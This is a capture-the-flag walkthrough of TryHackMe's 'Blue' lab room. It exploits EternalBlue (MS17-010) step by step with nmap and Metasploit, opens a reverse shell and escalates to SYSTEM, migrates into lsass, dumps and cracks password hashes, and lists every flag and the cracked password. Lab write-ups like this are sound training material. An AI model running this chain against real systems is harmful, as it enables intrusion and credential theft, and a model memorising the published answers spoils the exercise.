How to Test Vulnerable Windows. A Complete Guide of System Security…
Disclaimer
This guide is for educational purposes only. Always ensure you have proper authorization before testing any security vulnerability. Unauthorized hacking is illegal and unethical.
Introduction to Windows Hacking
Windows hacking often begins with identifying unpatched vulnerabilities in common services. One of the most notorious vulnerabilities in recent history is EternalBlue (MS17-010), which affects the Windows SMB service. This vulnerability was famously exploited by the WannaCry ransomware and remains a critical threat to unpatched systems.
In this comprehensive guide, I’ll walk you through exploiting EternalBlue step-by-step, using TryHackMe’s “Blue” room as our practice environment.
TryHackMe Blue Room Complete Walkthrough
Room Overview
TryHackMe Blue is a beginner-friendly room that teaches how to exploit the EternalBlue vulnerability (MS17-010) in Windows systems.
Task 1: Reconnaissance
Step 1: Scan the Machine
nmap -sS -sV -O 10.10.10.10
Results:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Answer: 3 ports open under 1000
Step 2: Identify Vulnerability
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
Answer: ms17-010
Task 2: Gain Access
Step 1: Start Metasploit
msfconsole
Step 2: Find Exploitation Code
use exploit/windows/smb/ms17_010_eternalblue
Answer: exploit/windows/smb/ms17_010_eternalblue
Step 3: Configure Exploit
show options
set RHOSTS 10.10.10.10
Answer: RHOSTS
Step 4: Set Payload and Execute
set payload windows/x64/shell/reverse_tcp
set LHOST tun0
exploit
Task 3: Escalate
Step 1: Background Shell
Press CTRL+Z or type background
Step 2: Convert to Meterpreter
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
Answers:
- Module: post/multi/manage/shell_to_meterpreter
- Option: SESSION
Step 3: Verify Privileges
sessions -i 2
getsystem
shell
whoami
exit
Step 4: Process Migration
ps
Find a process running as NT AUTHORITY\SYSTEM (for example PID 2244)
migrate 2244
Task 4: Cracking
Step 1: Dump Password Hashes
hashdump
Answer: Non-default user is Jon
Step 2: Crack the Password
Save hash to file and use John the Ripper:
john --format=NT hash.txt
john --show hash.txt
Answer: alqfina22
Finding the Flags
Flag 1: System Root
cat C:\flag1.txt
Flag: flag{access_the_machine}
Flag 2: Password Storage
cat C:\Windows\System32\config\flag2.txt
Flag: flag{sam_database_elevated_access}
Flag 3: User Documents
cat C:\Users\Jon\Documents\flag3.txt
Flag: flag{admin_documents_can_be_valuable}
Common Issues & Solutions
Problem: Exploit fails with port error
Fix: set LPORT 4445
Problem: Shell to meterpreter fails
Fix: Ensure the session is stable and try a different LPORT
Problem: Migration fails
Fix: Try PID 664 (services.exe) or PID 688 (lsass.exe)
Problem: Flag 2 missing
Fix: Restart machine and re-exploit quickly
Room Completion
After following these steps, you’ll complete all tasks and find all three flags. The room teaches essential penetration testing skills including vulnerability assessment, exploitation, privilege escalation, and post-exploitation techniques.
The TryHackMe Blue room is excellent for beginners because it provides hands-on experience with real-world vulnerabilities in a safe, controlled environment.
Remember: Always practice ethical hacking and only test systems you have permission to test.
My Badge: https://tryhackme.com/p/CyberArmy?show_achievement_badge=blue
